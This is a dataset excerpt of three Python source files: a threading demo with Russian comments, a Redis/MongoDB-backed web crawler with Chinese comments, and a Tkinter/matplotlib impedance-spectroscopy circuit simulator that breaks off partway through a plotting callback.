source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
threads.py
|
import threading
def writer(x, event_for_wait, event_for_set):
for i in range(5):
event_for_wait.wait() # wait for event
event_for_wait.clear() # clean event for future
print(x)
event_for_set.set() # set event for neighbor thread
# События управления потоками
e1 = threading.Event()
e2 = threading.Event()
e3 = threading.Event()
# Инициализация потоков
t1 = threading.Thread(target=writer, args=(1, e1, e2))
t2 = threading.Thread(target=writer, args=(2, e2, e3))
t3 = threading.Thread(target=writer, args=('3 \n', e3, e1))
# Запуск потоков
t1.start()
t2.start()
t3.start()
e3.set() # С какого потока начинать перебор
# join threads to the main thread
# PS тут не понял назначение
t1.join()
t2.join()
t3.join()
|
main.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:main.py
Author:Johnhay
date:20.9.26
-------------------------------------------------
Change Activity:20.9.26:
-------------------------------------------------
"""
import urllib
import urllib.request
from urllib.error import HTTPError
import datetime
from http.client import RemoteDisconnected
from retrying import retry
import threading
from bs4 import BeautifulSoup
from configure import config
import json
from loguru import logger
from first_extractor import SFExtractor
import rowblock_extractor
import Levenshtein
import re
import time
import random
import requests
###################################################################################
# 启动线程
###################################################################################
class MainThread(threading.Thread):
def __init__(self, thread_num=1, timeout=10.0):
super(MainThread, self).__init__()
self.thread_num = thread_num
self.timeout = timeout
self.stopped = False
def run(self):
def target_func():
logger.info('1.从Redis读URL')
url: dict = get_url_from_redis()
while url:
logger.info('2.访问URL,url={}'.format(url['_id']))
raw_html = get_html_from_url(url)
if raw_html:
logger.info('3.解析URL,url={}'.format(url['_id']))
get_content_from_html(url, raw_html)
logger.info('4.尝试发现相关URL,url={},depth={}'.format(url['_id'], url['depth']))
get_links_from_html(url, raw_html)
logger.info('5.保存URL,url={}'.format(url['_id']))
save_to_mongodb(url)
url: dict = get_url_from_redis()
for i in range(self.thread_num):
subthread = threading.Thread(target=target_func, args=())
subthread.setDaemon(True) # 设置子线程为守护线程时,主线程一旦执行结束,则全部线程全部被终止执行
subthread.start()
if not self.stopped:
subthread.join(self.timeout) # 主线程等待子线程超时时间
def stop(self):
self.stopped = True
def isStopped(self):
return self.stopped
###################################################################################
# 核心方法
###################################################################################
def retry_on_exception(exception):
return isinstance(exception, RemoteDisconnected) or isinstance(exception, ConnectionResetError) or isinstance(
exception, HTTPError)
@retry(stop_max_delay=config.RETRY_CFG['stop_max_delay'],
stop_max_attempt_number=config.RETRY_CFG['stop_max_attempt_number'],
wait_random_min=config.RETRY_CFG['wait_random_min'], wait_random_max=config.RETRY_CFG['wait_random_max'],
retry_on_exception=retry_on_exception)
def download_and_normalize(url: dict):
'''
:param url:{
'_id': 'http://www.gov.ph', # 唯一id
'url': 'http://www.gov.ph', # url地址
'website': 'http://www.gov.ph', # 所属根网站
'need_vpn':0,# 是否需要翻墙访问
'category': 0, # 网站类别
'threshold': 0.5, # 相似度阈值
'country': 'zh', # 'en', 配合keyword进行相似度计算
'name': '菲律宾政府', # url名字
'keyword': {'zh': [], 'en': []}, # 关键字列表
'depth': 0, # url相对website所处深度,0表示网站
'text': "文本内容", # 默认为空,如果成功则不为空
'log': '失败日志', # 默认为空,如果失败则不为空
'related_keyword': "", # topk的相关关键词词表字符串,逗号分隔
'url_time': "", # 网页最后修改时间
'crawl_time': "" # 网页抓取时间
}
:return:
'''
logger.info("url = {}, name = {}".format(url['_id'], url['name']))
proxy_handler = urllib.request.ProxyHandler(config.VNP_PROXIES)
opener = urllib.request.build_opener(proxy_handler)
req = urllib.request.Request(url['_id'], headers=config.HEADERS)
if url['need_vpn']:
resp = opener.open(req)
else:
resp = urllib.request.urlopen(req)
content_charset = resp.info().get_content_charset()
raw_html = resp.read()
if not raw_html:
return ''
best_match = ('', 0)
for charset in ['utf-8', 'gbk', 'big5', 'gb18030']:
try:
unicode_html = raw_html.decode(charset, 'ignore')
guess_html = unicode_html.encode(charset)
if len(guess_html) == len(raw_html):
best_match = (charset, len(guess_html))
break
elif len(guess_html) > best_match[1]:
best_match = (charset, len(guess_html))
except:
pass
if content_charset in ['utf-8', 'gbk', 'big5', 'gb18030']:
raw_html = raw_html.decode(content_charset, 'ignore')
else:
raw_html = raw_html.decode(best_match[0], 'ignore')
return raw_html
def get_url_from_redis():
url_pool = redis_client.keys()
url_pool.remove(config.URL_HISTORY_KEY)
if len(url_pool) == 0:
return None
else:
try:
target_url = random.choice(url_pool)
url = json.loads(redis_client.get(target_url))
# 更新访问历史
url_history = redis_client.get(config.URL_HISTORY_KEY)
url_history = url_history + ',' + target_url if url_history != '' else target_url
redis_client.set(config.URL_HISTORY_KEY, url_history)
logger.info('读URL成功!URL = {}'.format(url['_id']))
except Exception as e:
logger.error('读URL失败!URL = {},e = {}'.format(url['_id'], e))
else:
redis_client.delete(target_url)
return url
def get_html_from_url(url: dict):
if url is None: return None
try:
url['crawl_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
url['url_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
raw_html = download_and_normalize(url)
logger.info('下载URL成功!URL = {}'.format(url['_id']))
except Exception as e:
logger.error('下载URL失败!URL = {},e = {}'.format(url['_id'], e))
url['log'] = e
save_to_mongodb(url) # 保存到MongoDB
return None
return raw_html
def get_content_from_html(url: dict, raw_html: str):
'''
解析时间和正文文本
:param url:
:param raw_html:
:return:
'''
title, content1, keywords, desc = extractor.extract(raw_html)
url['name'] = title
content2 = rowblock_extractor.extract(raw_html)
def choose_content(content1, content2):
if (not content1) and (not content2):
url['log'] = '文本为空!'
return ''
return content1 if len(content1) > len(content2) else content2
url['text'] = choose_content(content1, content2)
if url['need_vpn']:
resp = requests.get(url['_id'], headers=config.HEADERS, proxies=config.VNP_PROXIES)
else:
resp = requests.get(url['_id'], headers=config.HEADERS)
if resp.status_code == 200 and 'Last-Modified' in resp.headers:
url['url_time'] = format_gmt_time(resp.headers['Last-Modified'])
def get_links_from_html(url: dict, raw_html: str):
if url is None: return
if raw_html is None: return
if url['depth'] >= config.DEFAULT_FLAGS['default_depth']:
return
soup = BeautifulSoup(raw_html, 'lxml')
# 全部links
candidate_links = find_candidate_links(soup, url['website'])
# logger.debug("candidate_links")
# logger.debug('\n'.join([re.sub(r'\s{2,}', '', str(x)) for x in candidate_links]))
# 相似度超过阈值的links
target_links = find_similar_links(candidate_links, url['keyword'].split(','), url['threshold'])
# logger.debug("similar_links")
# logger.debug(target_links)
for link, link_text, topk_keywords in target_links:
if url['country'] == 'zh':
link_text = re.sub(r'[^\u4e00-\u9fa5]', '', link_text)
elif url['country'] == 'en':
link_text = re.sub(r'[^a-zA-Z]', '', link_text)
if len(link_text) < 2:
continue
sub_url = {
'_id': link, # 唯一id
'url': 'link', # url地址
'website': url['website'], # 所属根网站
'need_vpn': url['need_vpn'], # 是否需要翻墙访问
'category': url['category'], # 网站类别
'threshold': url['threshold'], # 相似度阈值
'country': url['country'], # 'en', 配合keyword进行相似度计算
'name': link_text, # url名字,在采集的时候会更新
'keyword': url['keyword'], # 关键字列表
'depth': url['depth'] + 1, # url相对website所处深度,0表示网站
'text': "", # 默认为空,如果成功则不为空
'log': '', # 默认为空,如果失败则不为空
'related_keyword': topk_keywords, # topk的相关关键词词表字符串,逗号分隔
'url_time': "", # 网页最后修改时间
'crawl_time': "" # 网页抓取时间
}
# 加入redis
try:
url_history = redis_client.get(config.URL_HISTORY_KEY)
if sub_url['_id'] not in url_history:
redis_client.set(sub_url['_id'], json.dumps(sub_url))
logger.info('添加新URL成功!url = {}'.format(sub_url['_id']))
except Exception as e:
logger.error('添加新URL失败! url = {},e = {}'.format(sub_url['_id'], e))
def find_candidate_links(soup, website):
all_links = soup.find_all('a')
# logger.debug("all_links")
# logger.debug('\n'.join([re.sub(r'\s{2,}','',str(x)) for x in all_links]))
def extract_domain(url: str):
return urllib.parse.urlparse(url).netloc
def filter_href(link):
try:
href = link['href']
# url长度
if len(href) > 128:
return False
# url格式
if re.match(r'^https?:/{2}\w.+$', href):
# url属于当前域下
domain = extract_domain(website)
cur_domain = extract_domain(href)
if cur_domain != '' and (domain.endswith(cur_domain) or cur_domain.endswith(domain)):
return True
except KeyError as e:
return False
return False
def filter_text(link):
# 文本长度过滤
text = link.text.strip() if link.text != '' else ''
if len(text) < 2:
return False
return True
candidate_links = []
for link in all_links:
if filter_href(link) and filter_text(link):
candidate_links.append(link)
return candidate_links
def find_similar_links(candidate_links: list, keywords: list, threshold: float):
'''
计算query 与 每个keyword 的相似度score,总分和threshold比较,保留topk
:param all_links:
:return:[(link,link_text,topk_keywords),(link,link_text,topk_keywords)...]
'''
similar_links = []
def filter(text):
# 存在大于阈值的,即认为相似,并获取topk的关键词词表字符串
key_scores = sorted(
dict([(key.strip(), Levenshtein.jaro(text.lower(), key.strip().lower())) for key in keywords]).items(),
key=lambda x: x[1],
reverse=True)
if key_scores[0][1] > config.DEFAULT_FLAGS['default_threshold']:
return ','.join([key.strip() for key, _ in key_scores][:config.DEFAULT_FLAGS['default_topk']])
return ''
for link in candidate_links:
url = link['href'].strip()
text = link.text.strip()
related_keywords = filter(text)
if related_keywords != '':
similar_links.append((url, text, related_keywords))
return similar_links
def format_gmt_time(gmt_time):
GMT_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
try:
dt = datetime.datetime.strptime(gmt_time, GMT_FORMAT) + datetime.timedelta(hours=8)
except Exception:
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
return "{}-{}-{} {}:{}:{}".format(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
def save_to_mongodb(url: dict):
try:
id = url['_id']
mongo_client.replace_one({'_id': id}, url, upsert=True) # 更新或插入
logger.info("保存结果成功!url = {}".format(url['_id']))
except Exception as e:
logger.error('保存结果出错!url = {}, e = {}'.format(id, e))
if __name__ == '__main__':
mongo_client = config.mongo_client
redis_client = config.redis_client
extractor = SFExtractor()
logger.add(config.LOG_FILE, rotation="500 MB", encoding='utf-8')
start_timestamp = time.mktime(time.strptime(config.TIME_CFG['start_date'], "%Y-%m-%d %H:%M:%S"))
end_timestamp = time.mktime(time.strptime(config.TIME_CFG['end_date'], "%Y-%m-%d %H:%M:%S"))
thread = MainThread(thread_num=config.DEFAULT_FLAGS['default_thread']) # 线程数目
thread.start()
while True:
time.sleep(1)
if time.time() >= start_timestamp and time.time() <= end_timestamp:
pass
else:
thread.stop()
logger.info("运行时间到!,主程序结束!")
break
|
EIS_Simulator_final.py
|
from tkinter import *
from PIL import Image, ImageTk
from functools import partial
#import modules for opening and formatting windows and image processing
# pathway to image folder (note:change to your device path, if on Windows change backslashes to forward)
img_folder_path="F:/Python images for EIS"
imgfolder_4e = img_folder_path + "/4element/"
imgfolder_3e = img_folder_path + "/3element/"
imgfolder_2e = img_folder_path + "/2element/"
imgfolder_1e = img_folder_path + "/1element/"
# define dictionaries for storing images
img_dict_4e = {}
img_dict_3e = {}
img_dict_2e = {}
img_dict_1e = {}
# for loops to fill process/resize images with PIL and fill individual (1-4) image Dictionaries
for x in range(1, 11):
full_img_path = imgfolder_4e + f'pic4_{x}.png'
img_processed = Image.open(full_img_path)
img_processed = img_processed.resize((145, 125), Image.ANTIALIAS)
img_dict_4e[f'img4_{x}'] = img_processed
for x in range(1, 5):
full_img_path = imgfolder_3e + f'pic3_{x}.png'
img_processed = Image.open(full_img_path)
img_processed = img_processed.resize((145, 125), Image.ANTIALIAS)
img_dict_3e[f'img3_{x}'] = img_processed
for x in range(1, 3):
full_img_path = imgfolder_2e + f'pic2_{x}.png'
img_processed = Image.open(full_img_path)
img_processed = img_processed.resize((145, 125), Image.ANTIALIAS)
img_dict_2e[f'img2_{x}'] = img_processed
for x in range(1, 2):
full_img_path = imgfolder_1e + f'pic1_{x}.png'
img_processed = Image.open(full_img_path)
img_processed = img_processed.resize((145, 125), Image.ANTIALIAS)
img_dict_1e[f'img1_{x}'] = img_processed
# Construct combined image dictionary out of separate dictionaries
master_img_dict = {}
for key in img_dict_4e:
master_img_dict[key] = img_dict_4e[key]
for key in img_dict_3e:
master_img_dict[key] = img_dict_3e[key]
for key in img_dict_2e:
master_img_dict[key] = img_dict_2e[key]
for key in img_dict_1e:
master_img_dict[key] = img_dict_1e[key]
# Establish default string variable for Circuit Choice
chosen_circuit = "None"
# Define function to bring pop up windows to forefront
def window_tofront(window):
window.lift()
window.attributes('-topmost', True)
window.after_idle(window.attributes, '-topmost', False)
# function to open picture/button window of 4 element choices
# window text and size/frame setup
def four_element_choice():
four_window = Tk()
four_window.geometry("1000x500")
four_window.title("Circuit configuration Options")
label1 = Label(four_window, text="Choose from the possible circuit configurations.\nYou will be able to specify the identity of each element afterwards:", padx=10, pady=10)
label1.pack()
frame = LabelFrame(four_window, padx=50, pady=50)
frame.pack()
# Define function for pushing button event (alter chosencircuit variable with argument and close window)
def buttonpush(a):
global chosen_circuit
chosen_circuit = a
four_window.destroy()
# translate values in img_dict into an b_img_dict dictionary using ImageTk.photoimage to be usable in Tkinter
# for loops run through the circuit images in b_img_dict dictionary, creating a button in the window for each image in the dictionary
# a partial function (function with predetermined arguement) is assigned to each button, and the dictionary key for the buttons image is given
# as the buttonpush argument. This results in each button calling a function that changes chosencircuit to its image key name.
# if/elif statements to format button placement on grid
b_img_dict = {}
buttonnum = 1
for key in img_dict_4e:
b_img_dict[key] = ImageTk.PhotoImage(img_dict_4e[key])
for key in b_img_dict:
if buttonnum < 3:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=1, row=buttonnum, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 5:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=2, row=buttonnum - 2, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 7:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=3, row=buttonnum - 4, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 9:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=4, row=buttonnum - 6, padx=10, pady=10)
buttonnum = buttonnum + 1
elif buttonnum < 11:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=5, row=buttonnum - 8, padx=10, pady=10)
buttonnum = buttonnum + 1
# call window to front, mainloop window (to keep it open)
window_tofront(four_window)
four_window.mainloop()
# establish the chosen circuit as the return value for the window calling function
return chosen_circuit
# Function to open window for 3 element choices. Same logic as fourwindow but with different button grid layout
def three_element_choice():
three_window = Tk()
three_window.geometry("500x500")
three_window.title("Circuit configuration Options")
label1 = Label(three_window, text="Choose from the possible circuit configurations.\nYou will be able to specify the identity of each element afterwards:", padx=10, pady=10)
label1.pack()
frame = LabelFrame(three_window, padx=50, pady=50)
frame.pack()
def buttonpush(a):
global chosen_circuit
chosen_circuit = a
three_window.destroy()
b_img_dict = {}
buttonnum = 1
for key in img_dict_3e:
b_img_dict[key] = ImageTk.PhotoImage(img_dict_3e[key])
for key in b_img_dict:
if buttonnum < 3:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=1, row=buttonnum, padx=10, pady=10)
buttonnum = buttonnum + 1
else:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=2, row=buttonnum - 2, padx=10, pady=10)
buttonnum = buttonnum + 1
window_tofront(three_window)
three_window.mainloop()
return chosen_circuit
# Function to open window for 2 element choices. Same logic with altered button grid layout
def two_element_choice():
two_window = Tk()
two_window.geometry("500x350")
two_window.title("Circuit configuration Options")
label1 = Label(two_window, text="Choose from the possible circuit configurations.\nYou will be able to specify the identity of each element afterwards:", padx=10, pady=10)
label1.pack()
frame = LabelFrame(two_window, padx=50, pady=50)
frame.pack()
def buttonpush(a):
global chosen_circuit
chosen_circuit = a
two_window.destroy()
b_img_dict = {}
buttonnum = 1
for key in img_dict_2e:
b_img_dict[key] = ImageTk.PhotoImage(img_dict_2e[key])
for key in b_img_dict:
if buttonnum < 2:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=1, row=buttonnum, padx=10, pady=10)
buttonnum = buttonnum + 1
else:
buttontest = Button(frame, image=b_img_dict[key], command=partial(buttonpush, key))
buttontest.grid(column=2, row=buttonnum - 1, padx=10, pady=10)
buttonnum = buttonnum + 1
window_tofront(two_window)
two_window.mainloop()
return chosen_circuit
# function to call appropriate window based on integer value (provided by user) and return circuit dictionary image key
# clickable window unnecessary for 1 element (only 1 choice)
def determine_circuit_config(n):
if n == 4:
return four_element_choice()
elif n == 3:
return three_element_choice()
elif n == 2:
return two_element_choice()
elif n == 1:
return "img1_1"
# import modules for mathematical operation
import matplotlib.pyplot as plt
import numpy as np
import cmath as cm
import pandas as pd
###### Introduction screen and number/type of elements are obtained in this block##################
###################################################################################################
print(30 * '-')
print("WELCOME TO EIS SIMULATOR")
print(30 * '-')
print("Ciruit element codes: ")
print("R: Resistance")
print("C: Capacitance")
print("CPE: Constant Phase Element")
print("W: Warburg Impedance")
print(30 * '-')
###########################
## Robust error handling ##
## only accept int 1-4 ##
###########################
## Wait for valid input in while...not ###
is_valid = 0
# obtain number of elements user wishes to simulate. keep asking for a number until user inputs integer from 1-4
# try/except for error handling of float and string inputs, while loop to ensure value 1-4
while not is_valid:
n_elements_str = input('How many elements would you like to simulate? Enter an integer value (1-4) : ')
try:
n_elements = int(n_elements_str)
if n_elements >= 1 and n_elements <= 4:
is_valid = 1 ## set it to 1 to validate input and to terminate the while..not loop
else:
print(str(n_elements) + " is not a valid integer. \nPlease enter an integer value from 1-4.")
except ValueError:
print(str(n_elements_str) + " is not a valid integer. \nPlease enter an integer value from 1-4.")
# Run user picture selection window to determine circuit config
user_choice_img_key = determine_circuit_config(n_elements)
# convert image dictionary key string to be used for circuits dictionary
user_choice_circuits_key = user_choice_img_key.lstrip("img")
# Use PIL to resize users chosen circuit image for reference display # quit program if KeyError: User closed image selection window without picking circuit
try:
user_choice_img = master_img_dict[user_choice_img_key].resize((290, 250), Image.ANTIALIAS)
except KeyError:
quit()
# define variable to determine when user is done with data inputs to close reference picture window
user_inputs_done = False
# Open window with circuit reference picture to assist in element assignment
def open_reference_window():
global user_inputs_done
global user_choice_img
reference_window = Tk()
reference_window.geometry("500x400")
reference_window.title("Simulated Circuit Configuration")
frame = LabelFrame(reference_window,
text="Below is your chosen circuit for reference as you specify element identities :", padx=50,
pady=50)
frame.pack()
reference_img = ImageTk.PhotoImage(user_choice_img)
label = Label(frame, image=reference_img)
label.pack()
def do_nothing(): # disabling closewindow button (window closes automatically when user finishes inputs)
pass
reference_window.protocol('WM_DELETE_WINDOW', do_nothing)
window_tofront(reference_window)
# continue to update window (showing window onscreen) until user finishes inputs
while not user_inputs_done:
reference_window.update()
# destroy tkinter window so that Tkinter does not continue to reference this window's data later in the program
reference_window.destroy()
# Import threading, create separate thread for pulling up circuit reference window, and start thread
# This allows user input code to continue while the window code runs and loops
import threading
thread_1 = threading.Thread(target=open_reference_window)
thread_1.start()
### obtain type of elements and parameters
# elements types are stored in list
# parameters are stored in params list, with corresponding index as element_types list.
# if more than one parameter is needed to describe and element ie. CPE or W, the value stored in params is a nested list with multiple parameters.
#####object element_types specifies the user defined elements, object params has the corresponding parameters in the same index############
###### For example if element_types[1] is a Warburg impedance, params[1] will be a tuple with (A, D_O, D_R, c_0_bulk, c_R_bulk, n_el)######
element_types = []
params = []
def check_neg_error(a): # function designed to produce valueerror if given a negative or 0 as an argument
if a <= 0:
cause_error = int("str")
pass
else:
pass
# for loop through element number, this loop addresses and collects parameters for each element 1-4 one at a time
for i in range(1, n_elements + 1):
valid = 0
while not valid: # ensure user input is only allowed element types R, C, CPE, or W
ith_element = input('What is element #' + str(i) + '? ')
if ith_element in ['R', 'C', 'CPE', 'W']:
valid = 1
else:
print(str(
ith_element) + " is not a valid input. \nPlease choose from R. Resistor, C. Capacitance, CPE. Constant Phase Element, W. Warburg Impedance")
element_types.append(ith_element)
valid_values = 0
while not valid_values: ## while loop prompts user for values dependant on element identity, checks those values for errors, and if valid appends them to a list of parameters and breaks loop
try:
if ith_element == 'R':
r = float(input("Please specify the resitance in Ohms : "))
check_neg_error(r)
params.append(r)
elif ith_element == 'C':
c = float(input("Please specify the capacitance in F : "))
check_neg_error(c)
params.append(c)
elif ith_element == 'CPE':
ntrue = 0
q = float(input("Please specify the Q parameter in F : "))
check_neg_error(q)
while not ntrue:
n = float(input(
"Please specify the ideality factor n between 0 and 1 : ")) # ensure that the ideality factor is indeed between 0 and 1 or continue asking for it until it is.
if n >= 0 and n <= 1:
ntrue = 1
else:
print(str(n) + " is not between 0 and 1.")
params.append([q, n])
else:
choose_sigma = False
choose_param = False
print(
"Would you like to provide the general Warburg coefficent \u03C3 or more specific parameters (ie. species concentrations, diffusion coefficients etc.)?")
## determine whether user wants to enter warburg coefficient or individual concentration/diffusion parameters
while not choose_param and not choose_sigma:
sigma_or_param = str(input("Enter \'sigma\' or \'parameters\' : "))
if sigma_or_param == "sigma":
choose_sigma = True
elif sigma_or_param == "parameters":
choose_param = True
else:
print("Please enter one of the provided responses.")
if choose_sigma:
sigma_val = float(
input("Please specify the value of the Warburg coefficient \u03C3 in Ohms/\u221asec : "))
check_neg_error(sigma_val)
params.append([sigma_val])
else:
A = float(input("Please specify the area A in cm^2 : "))
check_neg_error(A)
D_O = float(input("Please specify the diffusion coefficient of the oxidized species in cm^2/s : "))
check_neg_error(D_O)
D_R = float(input("Please specify the diffusion coefficient of the reduced species in cm^2/s : "))
check_neg_error(D_R)
c_O_bulk = float(
input("Please specify the bulk concentration of oxidized species in mol/L : ")) / 1000
check_neg_error(c_O_bulk)
c_R_bulk = float(
input("Please specify the bulk concentration of reduced species in mol/L : ")) / 1000
check_neg_error(c_R_bulk)
n_el = int(input("Please specify the number of electrons in the redox reaction: "))
check_neg_error(n_el)
params.append([A, D_O, D_R, c_O_bulk, c_R_bulk, n_el])
valid_values = 1
except ValueError: #if Valueerror occurs, code skips changing the validvalues variable to one, prints invalid value statement, and restarts the current while loop
print("You have entered an invalid value. Please ensure entered values are positive and numerical.")
lo_hi = 0 # check that the frequency range is correctly specified, low to high, positive, and numerical
pos_freq = 0
nonstr_freq = 0
while not nonstr_freq:
try:
while not lo_hi or not pos_freq:
lo_hi = 0
pos_freq = 0
low_f = float(input("What is the lowest frequency f (in Hz) that you would like to simulate? : "))
high_f = float(input("What is the highest frequency f (in Hz) that you would like to simulate? : "))
if high_f > low_f:
lo_hi = 1
else:
print(
"Your upper frequency is lower than your lowest frequency, please ensure a proper frequency range.")
if low_f > 0 and high_f > 0:
pos_freq = 1
else:
print("Please ensure a proper frequency range with positive values above 0 Hz.")
nonstr_freq = 1
except ValueError:
print("Please ensure you have entered positive numerical values for your frequency range.")
# Alter variable to indicate user is done with data input to close reference picture window
user_inputs_done = True
# create range of frequencies for calculation in increments in logspace
w_input = np.logspace(np.log10(low_f), np.log10(high_f), num=1000)
# multiply each element in the f range by 2pi and append to new list to give list of angular frequencies
w_range = []
for w in w_input:
x = round(2 * np.pi * w, 4)
w_range.append(x)
print(element_types)
print(params)
### Calculating Individual Element Impedances ###
# Able to take a frequency range, and relevant parameters from user input
# Returns an np.array of impedances for each frequency value
# Resistor
# w is array of angular frequencies in rad/s
# R is resistance in ohms
def Z_R(w, R):
Re_Z = np.full(len(w), R)
Im_Z = np.zeros(len(w))
return Re_Z + Im_Z
# Capacitor
# w is array of angular frequencies in rad/s
# C is capacitance in farads
def Z_C(w, C):
x = np.array(w)
Re_Z = np.zeros(len(w))
Im_Z = -1 / (x * C) * 1j
return Re_Z + Im_Z
# Constant phase element
# w is array of angular frequencies in rad/s
# n is a number between 0 and 1
def Z_CPE(w, params):
x = np.array(w)
Q = params[0]
n = params[1]
Re_Z = (1 / (Q * (x ** n))) * cm.cos(cm.pi * n / 2)
Im_Z = (-1 / (Q * (x ** n))) * cm.sin(cm.pi * n / 2) * 1j
return Re_Z + Im_Z
# Warburg impedance
# w is array of angular frequencies in rad/s
# A is electrode area in A/cm^2
# D_O and D_R are diffusion coefficients for oxidized and reduced species in cm^2/s
# c_O_bulk and c_R_bulk are bulk concentrations for oxidized and reduced species in mol/cm^3
def Z_W(w, params):
x = np.array(w)
if len(params) == 6:
A = params[0]
D_O = params[1]
D_R = params[2]
c_O_bulk = params[3]
c_R_bulk = params[4]
n = params[5]
R = 8.314 # J/K•mol
F = 96485 # C/mol
T = 298 # K
sigma = (R * T / ((n * F) ** 2 * A * 2 ** 0.5) * ((1 / D_O ** 0.5 / c_O_bulk) + (1 / D_R ** 0.5 / c_R_bulk)))
Re_Z = sigma / x ** 0.5
Im_Z = -sigma / x ** 0.5 * 1j
return Re_Z + Im_Z
else:
Re_Z = params[0] / x ** 0.5
Im_Z = -params[0] / x ** 0.5 * 1j
return Re_Z + Im_Z
### Handling User Input of Element Parameters ###
# Input/circuit dictionary
circuits_dict = {}
# Convert user input parameters into impedance arrays
el_impedance = []
# take inputs and calculate Z for element type.
for i in range(n_elements):
if element_types[i] == 'R':
zi = Z_R(w_range, params[i])
elif element_types[i] == 'C':
zi = Z_C(w_range, params[i])
elif element_types[i] == 'CPE':
zi = Z_CPE(w_range, params[i])
else:
zi = Z_W(w_range, params[i])
el_impedance.append(zi)
# Assigns the calculated impedance to specific elements
if n_elements == 1:
E1 = el_impedance[0]
E2 = 0
E3 = 0
E4 = 0
elements = [E1]
elif n_elements == 2:
E1 = el_impedance[0]
E2 = el_impedance[1]
E3 = 0
E4 = 0
elements = [E1, E2]
elif n_elements == 3:
E1 = el_impedance[0]
E2 = el_impedance[1]
E3 = el_impedance[2]
E4 = 0
elements = [E1, E2, E3]
else:
E1 = el_impedance[0]
E2 = el_impedance[1]
E3 = el_impedance[2]
E4 = el_impedance[3]
elements = [E1, E2, E3, E4]
### Listing Possible Circuit Configurations ###
# Possible circuits for 4 elements
circuits_4 = [[[E1, E2, E3, E4]],
[[E1, E2, (E3, E4)]],
[[E1, ([E2, E3], E4)]],
[(E4, [E2, E3, E1])],
[([E1, E3], [E2, E4])],
[[(E1, E2), (E3, E4)]],
[([E1, (E2, E3)], E4)],
[[E1, (E2, E3, E4)]],
[([E1, E2], E3, E4)],
[(E1, E2, E3, E4)]]
for count, array in enumerate(circuits_4):
circuits_dict["4_" + str(count + 1)] = circuits_4[count]
# Possible inputs for 3 elements
circuits_3 = [[[E1, E2, E3]],
[[E1, (E2, E3)]],
[([E1, E2], E3)],
[(E1, E2, E3)]]
for count, array in enumerate(circuits_3):
circuits_dict["3_" + str(count + 1)] = circuits_3[count]
# Possible inputs for 2 elements
circuits_2 = [[[E1, E2]],
[(E1, E2)]]
for count, array in enumerate(circuits_2):
circuits_dict["2_" + str(count + 1)] = circuits_2[count]
# Possible inputs for 1 element
circuits_1 = [[E1]]
for count, array in enumerate(circuits_1):
circuits_dict["1_" + str(count + 1)] = circuits_1[count]
### Functions for Calculating Impedance ###
# Function for adding impedances in series
def add_series_Z(elements):
return np.sum(elements, axis=0)
# Function for adding impedances in parallel
def add_parallel_Z(elements):
inv_elements = []
for i in elements:
inv_elements.append(1 / i)
return 1 / (np.sum(inv_elements, axis=0))
# Logic Loop for calculating total impedance
def calc_Z(input_circuit, config):
circuit = input_circuit
# Tuple can't be modified so create a dummy list to store calculations
dummy_circuit = []
# while not all(isinstance(x, np.ndarray) for x in dummy_circuit):
for i, feature in enumerate(circuit):
if isinstance(feature, np.ndarray):
dummy_circuit.append(feature)
elif isinstance(feature, list):
if all(isinstance(circuit, np.ndarray) for i in feature):
dummy_circuit.append(add_series_Z(feature))
else:
dummy_circuit.append(calc_Z(feature, "series"))
elif isinstance(feature, tuple):
if all(isinstance(circuit, np.ndarray) for i in feature):
dummy_circuit.append(add_parallel_Z(feature))
else:
dummy_circuit.append(calc_Z(feature, "parallel"))
if config == "parallel":
return add_parallel_Z(dummy_circuit)
elif config == "series":
return add_series_Z(dummy_circuit)
### Plotting the Calculated Impedances ###
# Construct Frequency list from angular frequency list
f_range = []
two_pi = round(2 * np.pi, 4)
for _ in range(len(w_range)):
f_range.append(w_range[_] / two_pi)
# Convert w and f lists into arrays
w_array = np.array(w_range)
f_array = np.array(f_range)
# Set Parameters for Nyquist Plot
circuit = circuits_dict[user_choice_circuits_key]
impedance_array = calc_Z(circuit, "series")
x = impedance_array.real
y = -1 * impedance_array.imag
fig, ax = plt.subplots()
ax.set_title('Simulated Nyquist Plot')
ax.set_ylabel('-Z\" (Ohms)')
ax.set_xlabel('Z\' (Ohms)')
# if Z imaginary is 0 at all points, The resistance is independant of frequency, all plotted points are the same Z" and Z'
# The plot should be given as scatter instead of line such that the singular point is visible on the graph
# picker property for points on the plot is activated with 5 pixel radius to allow artist elements (points) to be selected on click
Zimag_allzero = True
for _ in range(len(y)):
if y[_] != 0:
Zimag_allzero = False
if Zimag_allzero:
y = np.zeros(len(y))
line = ax.plot(x, y, "o", picker=True, pickradius=5)
else:
line = ax.plot(x, y, picker=True, pickradius=5)
# plotting axis scales as equal in a square axis allows graph to be read more easily qualitatively
plt.axis("square")
# Set up Plot Annotation Visual and disable it until onpick click event
annot = ax.annotate("", xy=(0, 0), xytext=(-40, 40), textcoords="offset points",
bbox=dict(boxstyle='round4', fc='linen', ec='k', lw=1),
arrowprops=dict(arrowstyle='-|>'))
# hide annotation until made visible by click event
annot.set_visible(False)
# define Pick point/annotate graph function
def onpick(event):
global w_array ## use global values for the frequency lists
global f_array
thisline = event.artist
xdata = thisline.get_xdata() ##get data x,y from plot
ydata = thisline.get_ydata()
ind = event.ind ## click event establishes index of plotted elements
xpoints = xdata[ind]
